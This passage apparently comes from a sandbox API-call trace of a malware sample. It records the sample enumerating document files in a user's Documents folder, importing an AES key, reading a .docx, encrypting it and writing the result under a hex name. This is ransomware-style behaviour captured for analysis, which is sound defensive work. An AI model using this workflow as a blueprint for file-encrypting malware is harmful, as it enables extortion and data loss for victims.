lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5232660, ftCreationTime.dwHighDateTime=0x1d4d1c1, ftLastAccessTime.dwLowDateTime=0xeb2d8840, ftLastAccessTime.dwHighDateTime=0x1d4cb7c, ftLastWriteTime.dwLowDateTime=0xeb2d8840, ftLastWriteTime.dwHighDateTime=0x1d4cb7c, nFileSizeHigh=0x0, nFileSizeLow=0x14a53, dwReserved0=0x0, dwReserved1=0x0, cFileName="GSXuytaRGthMal4dUFG.odt", cAlternateFileName="GSXUYT~1.ODT")) returned 1 [0071.460] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a1e2590, ftCreationTime.dwHighDateTime=0x1d4b930, ftLastAccessTime.dwLowDateTime=0xb9148fa0, ftLastAccessTime.dwHighDateTime=0x1d4b166, ftLastWriteTime.dwLowDateTime=0xb9148fa0, ftLastWriteTime.dwHighDateTime=0x1d4b166, nFileSizeHigh=0x0, nFileSizeLow=0x25dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="HGjIZA52n2jSImcnl.xlsx", cAlternateFileName="HGJIZA~1.XLS")) returned 1 [0071.460] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e1657f0, ftCreationTime.dwHighDateTime=0x1d4d318, ftLastAccessTime.dwLowDateTime=0xcdd5ab90, ftLastAccessTime.dwHighDateTime=0x1d4d015, ftLastWriteTime.dwLowDateTime=0xcdd5ab90, ftLastWriteTime.dwHighDateTime=0x1d4d015, nFileSizeHigh=0x0, nFileSizeLow=0x94af, dwReserved0=0x0, dwReserved1=0x0, cFileName="jeaESM-yM5.odp", cAlternateFileName="JEAESM~1.ODP")) returned 1 [0071.460] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8336b140, ftCreationTime.dwHighDateTime=0x1d52562, ftLastAccessTime.dwLowDateTime=0x4e064650, ftLastAccessTime.dwHighDateTime=0x1d4b4a3, ftLastWriteTime.dwLowDateTime=0x4e064650, ftLastWriteTime.dwHighDateTime=0x1d4b4a3, nFileSizeHigh=0x0, nFileSizeLow=0x981c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jo5pYAfRJdxUnxXq.xlsx", cAlternateFileName="JO5PYA~1.XLS")) returned 1 [0071.461] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d5d2f0, ftCreationTime.dwHighDateTime=0x1d4fa62, ftLastAccessTime.dwLowDateTime=0xd6e5aa20, ftLastAccessTime.dwHighDateTime=0x1d4e427, ftLastWriteTime.dwLowDateTime=0xd6e5aa20, ftLastWriteTime.dwHighDateTime=0x1d4e427, nFileSizeHigh=0x0, nFileSizeLow=0x1811a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LM400zl.docx", cAlternateFileName="LM400Z~1.DOC")) returned 1 [0071.461] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3d8d890, ftCreationTime.dwHighDateTime=0x1d4e13d, ftLastAccessTime.dwLowDateTime=0xc603e3a0, ftLastAccessTime.dwHighDateTime=0x1d4bec7, ftLastWriteTime.dwLowDateTime=0xc603e3a0, ftLastWriteTime.dwHighDateTime=0x1d4bec7, nFileSizeHigh=0x0, nFileSizeLow=0x11257, dwReserved0=0x0, dwReserved1=0x0, cFileName="M8JcrX7yq.xlsx", cAlternateFileName="M8JCRX~1.XLS")) returned 1 [0071.461] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa60664e0, ftCreationTime.dwHighDateTime=0x1d4b0f5, ftLastAccessTime.dwLowDateTime=0xf0e32930, ftLastAccessTime.dwHighDateTime=0x1d5366a, ftLastWriteTime.dwLowDateTime=0xf0e32930, ftLastWriteTime.dwHighDateTime=0x1d5366a, nFileSizeHigh=0x0, nFileSizeLow=0x1078c, dwReserved0=0x0, dwReserved1=0x0, cFileName="meFxPWjRmSR9B4.pptx", cAlternateFileName="MEFXPW~1.PPT")) returned 1 [0071.461] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdac6ce00, ftCreationTime.dwHighDateTime=0x1d4ce04, ftLastAccessTime.dwLowDateTime=0xe764f600, ftLastAccessTime.dwHighDateTime=0x1d4ce86, ftLastWriteTime.dwLowDateTime=0xe764f600, ftLastWriteTime.dwHighDateTime=0x1d4ce86, nFileSizeHigh=0x0, nFileSizeLow=0x18688, dwReserved0=0x0, dwReserved1=0x0, cFileName="ML2y-eOY.rtf", cAlternateFileName="")) returned 1 [0071.461] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0071.461] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0071.461] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0071.462] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0071.462] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aad0ea0, ftCreationTime.dwHighDateTime=0x1d4ca87, ftLastAccessTime.dwLowDateTime=0x31274250, ftLastAccessTime.dwHighDateTime=0x1d4ca83, ftLastWriteTime.dwLowDateTime=0x31274250, ftLastWriteTime.dwHighDateTime=0x1d4ca83, nFileSizeHigh=0x0, nFileSizeLow=0x15f21, dwReserved0=0x0, dwReserved1=0x0, cFileName="n7YNyCb 6B.odt", cAlternateFileName="N7YNYC~1.ODT")) returned 1 [0071.462] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfa83010, ftCreationTime.dwHighDateTime=0x1d4ca1f, ftLastAccessTime.dwLowDateTime=0x99ada280, ftLastAccessTime.dwHighDateTime=0x1d4c6e9, ftLastWriteTime.dwLowDateTime=0x99ada280, ftLastWriteTime.dwHighDateTime=0x1d4c6e9, nFileSizeHigh=0x0, nFileSizeLow=0xe36f, dwReserved0=0x0, dwReserved1=0x0, cFileName="nVOK D.pptx", cAlternateFileName="NVOKD~1.PPT")) returned 1 [0071.462] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1421ddd0, ftCreationTime.dwHighDateTime=0x1d4cddc, ftLastAccessTime.dwLowDateTime=0x1757bea0, ftLastAccessTime.dwHighDateTime=0x1d4d4e6, ftLastWriteTime.dwLowDateTime=0x1757bea0, ftLastWriteTime.dwHighDateTime=0x1d4d4e6, nFileSizeHigh=0x0, nFileSizeLow=0xdb0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="oOI3qd09uyx pA91lnJ.pptx", cAlternateFileName="OOI3QD~1.PPT")) returned 1 [0071.462] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0071.462] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8188be60, ftCreationTime.dwHighDateTime=0x1d4cc66, ftLastAccessTime.dwLowDateTime=0xc2317910, ftLastAccessTime.dwHighDateTime=0x1d4cb63, ftLastWriteTime.dwLowDateTime=0xc2317910, ftLastWriteTime.dwHighDateTime=0x1d4cb63, nFileSizeHigh=0x0, nFileSizeLow=0xa001, dwReserved0=0x0, dwReserved1=0x0, cFileName="pLHg8_t9.docx", cAlternateFileName="PLHG8_~1.DOC")) returned 1 [0071.462] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65348f60, ftCreationTime.dwHighDateTime=0x1d4e5e2, ftLastAccessTime.dwLowDateTime=0x5aa029a0, ftLastAccessTime.dwHighDateTime=0x1d4db66, ftLastWriteTime.dwLowDateTime=0x5aa029a0, ftLastWriteTime.dwHighDateTime=0x1d4db66, nFileSizeHigh=0x0, nFileSizeLow=0x2e4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="r33XDXTp.docx", cAlternateFileName="R33XDX~1.DOC")) returned 1 [0071.463] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba233bc0, ftCreationTime.dwHighDateTime=0x1d4d0bb, ftLastAccessTime.dwLowDateTime=0x7f5fd4a0, ftLastAccessTime.dwHighDateTime=0x1d4faad, ftLastWriteTime.dwLowDateTime=0x7f5fd4a0, ftLastWriteTime.dwHighDateTime=0x1d4faad, nFileSizeHigh=0x0, nFileSizeLow=0x1583e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uh8zTJx.xlsx", cAlternateFileName="UH8ZTJ~1.XLS")) returned 1 [0071.463] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4244dd80, ftCreationTime.dwHighDateTime=0x1d4cdae, ftLastAccessTime.dwLowDateTime=0x4fea7030, ftLastAccessTime.dwHighDateTime=0x1d4c89a, ftLastWriteTime.dwLowDateTime=0x4fea7030, ftLastWriteTime.dwHighDateTime=0x1d4c89a, nFileSizeHigh=0x0, nFileSizeLow=0xf881, dwReserved0=0x0, dwReserved1=0x0, cFileName="uHqM 5ER-b2IqJm_M.xls", cAlternateFileName="UHQM5E~1.XLS")) returned 1 [0071.463] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31f2fe0, ftCreationTime.dwHighDateTime=0x1d4d532, ftLastAccessTime.dwLowDateTime=0x91c23880, ftLastAccessTime.dwHighDateTime=0x1d4c638, ftLastWriteTime.dwLowDateTime=0x91c23880, ftLastWriteTime.dwHighDateTime=0x1d4c638, nFileSizeHigh=0x0, nFileSizeLow=0x40a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="uokq05CLt9KkwZ-Bx.xls", cAlternateFileName="UOKQ05~1.XLS")) returned 1 [0071.464] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc9fcdf0, ftCreationTime.dwHighDateTime=0x1d4f57b, ftLastAccessTime.dwLowDateTime=0xad3bf630, ftLastAccessTime.dwHighDateTime=0x1d50686, ftLastWriteTime.dwLowDateTime=0xad3bf630, ftLastWriteTime.dwHighDateTime=0x1d50686, nFileSizeHigh=0x0, nFileSizeLow=0x623a, dwReserved0=0x0, dwReserved1=0x0, cFileName="VcLUa_IRpSFwCdtTeIUe.pptx", cAlternateFileName="VCLUA_~1.PPT")) returned 1 [0071.464] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5587560, ftCreationTime.dwHighDateTime=0x1d4c7d6, ftLastAccessTime.dwLowDateTime=0x9b01d350, ftLastAccessTime.dwHighDateTime=0x1d4fa9b, ftLastWriteTime.dwLowDateTime=0x9b01d350, ftLastWriteTime.dwHighDateTime=0x1d4fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x1ab3, dwReserved0=0x0, dwReserved1=0x0, cFileName="vgYnkjmm0.pptx", cAlternateFileName="VGYNKJ~1.PPT")) returned 1 [0071.464] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fef6d0, ftCreationTime.dwHighDateTime=0x1d4d022, ftLastAccessTime.dwLowDateTime=0x2d803120, ftLastAccessTime.dwHighDateTime=0x1d4cf56, ftLastWriteTime.dwLowDateTime=0x2d803120, ftLastWriteTime.dwHighDateTime=0x1d4cf56, nFileSizeHigh=0x0, nFileSizeLow=0xfdb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="wdgDbpNHL6HoRO.pptx", cAlternateFileName="WDGDBP~1.PPT")) returned 1 [0071.464] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ebcb130, ftCreationTime.dwHighDateTime=0x1d4ca17, ftLastAccessTime.dwLowDateTime=0x5aa97dc0, ftLastAccessTime.dwHighDateTime=0x1d4cd97, ftLastWriteTime.dwLowDateTime=0x5aa97dc0, ftLastWriteTime.dwHighDateTime=0x1d4cd97, nFileSizeHigh=0x0, nFileSizeLow=0x12bd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="XiWrk6UWjSknH.odp", cAlternateFileName="XIWRK6~1.ODP")) returned 1 [0071.464] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ebcb130, ftCreationTime.dwHighDateTime=0x1d4ca17, ftLastAccessTime.dwLowDateTime=0x5aa97dc0, ftLastAccessTime.dwHighDateTime=0x1d4cd97, ftLastWriteTime.dwLowDateTime=0x5aa97dc0, ftLastWriteTime.dwHighDateTime=0x1d4cd97, nFileSizeHigh=0x0, nFileSizeLow=0x12bd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="XiWrk6UWjSknH.odp", cAlternateFileName="XIWRK6~1.ODP")) returned 0 [0071.464] FindClose (in: hFindFile=0x1a5de0f0 | out: hFindFile=0x1a5de0f0) returned 1 [0071.464] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5dad0) returned 1 [0071.464] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da90) returned 1 [0071.465] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", lpFilePart=0x0) returned 0x32 [0071.465] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", lpFilePart=0x0) returned 0x32 [0071.466] CryptAcquireContextW (in: phProv=0x1bf5da68, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5da68*=0x1a5b7c10) returned 1 [0071.467] CryptImportKey (in: hProv=0x1a5b7c10, pbData=0x2346e08, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a626bb0) returned 1 [0071.467] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.467] CryptExportKey (in: hKey=0x1a626bb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0071.467] CryptExportKey (in: hKey=0x1a626bb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2346ef8, pdwDataLen=0x1bf5db30 | out: pbData=0x2346ef8*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0071.467] CryptImportKey (in: hProv=0x1a5b7c10, pbData=0x2347018, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626a60) returned 1 [0071.467] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.467] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.467] CryptDuplicateKey (in: hKey=0x1a626a60, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626e50) returned 1 [0071.467] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.467] CryptSetKeyParam (hKey=0x1a626e50, dwParam=0x4, pbData=0x2347160*=0x1, dwFlags=0x0) returned 1 [0071.467] CryptSetKeyParam (hKey=0x1a626e50, dwParam=0x1, pbData=0x2347110, dwFlags=0x0) returned 1 [0071.467] CryptDestroyKey (hKey=0x1a626a60) returned 1 [0071.467] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0071.467] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", lpFilePart=0x0) returned 0x32 [0071.467] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0071.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1g4jk.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0071.467] GetFileType (hFile=0x36c) returned 0x1 [0071.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0071.467] GetFileType (hFile=0x36c) returned 0x1 [0071.468] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062", lpFilePart=0x0) returned 0x48 [0071.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0071.468] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b0d703bce4dec0768914707f8b022062"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x368 [0071.468] GetFileType (hFile=0x368) returned 0x1 [0071.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0071.468] GetFileType (hFile=0x368) returned 0x1 [0071.469] ReadFile (in: hFile=0x36c, lpBuffer=0x2347500, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2347500*, lpNumberOfBytesRead=0x1bf5da28*=0xa25a, lpOverlapped=0x0) returned 1 [0071.471] CryptEncrypt (in: hKey=0x1a626e50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x235b518*, pdwDataLen=0x1bf5da80*=0xa250, dwBufLen=0xa250 | out: pbData=0x235b518*, pdwDataLen=0x1bf5da80*=0xa250) returned 1 [0071.471] WriteFile (in: hFile=0x368, lpBuffer=0x235b518*, nNumberOfBytesToWrite=0xa250, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x235b518*, lpNumberOfBytesWritten=0x1bf5da18*=0xa250, lpOverlapped=0x0) returned 1 [0071.472] ReadFile (in: hFile=0x36c, lpBuffer=0x2347500, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2347500*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0071.472] CryptEncrypt (in: hKey=0x1a626e50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23657a8*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x23657a8*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0071.473] CryptEncrypt (in: hKey=0x1a626e50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x23657f8*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x23657f8*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0071.473] WriteFile (in: hFile=0x368, lpBuffer=0x2365848*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x2365848*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0071.473] CloseHandle (hObject=0x368) returned 1 [0071.474] CloseHandle (hObject=0x36c) returned 1 [0071.474] CryptDestroyKey (hKey=0x1a626bb0) returned 1 [0071.474] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0071.474] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0071.474] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062", lpFilePart=0x0) returned 0x48 [0071.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0071.474] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b0d703bce4dec0768914707f8b022062"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0071.474] GetFileType (hFile=0x36c) returned 0x1 [0071.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0071.474] GetFileType (hFile=0x36c) returned 0x1 [0071.475] ReadFile (in: hFile=0x36c, lpBuffer=0x2366f40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2366f40*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0071.476] ReadFile (in: hFile=0x36c, lpBuffer=0x2366f40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2366f40*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0071.477] ReadFile (in: hFile=0x36c, lpBuffer=0x2366f40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2366f40*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0071.478] ReadFile (in: hFile=0x36c, lpBuffer=0x2366f40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2366f40*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0071.479] ReadFile (in: hFile=0x36c, lpBuffer=0x2366f40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2366f40*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0071.479] ReadFile (in: hFile=0x36c, lpBuffer=0x2366f40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2366f40*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0071.479] ReadFile (in: hFile=0x36c, lpBuffer=0x2366f40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2366f40*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0071.479] ReadFile (in: hFile=0x36c, lpBuffer=0x2366f40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2366f40*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0071.479] ReadFile (in: hFile=0x36c, lpBuffer=0x2366f40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2366f40*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0071.479] ReadFile (in: hFile=0x36c, lpBuffer=0x2366f40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2366f40*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0071.480] ReadFile (in: hFile=0x36c, lpBuffer=0x2366f40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: 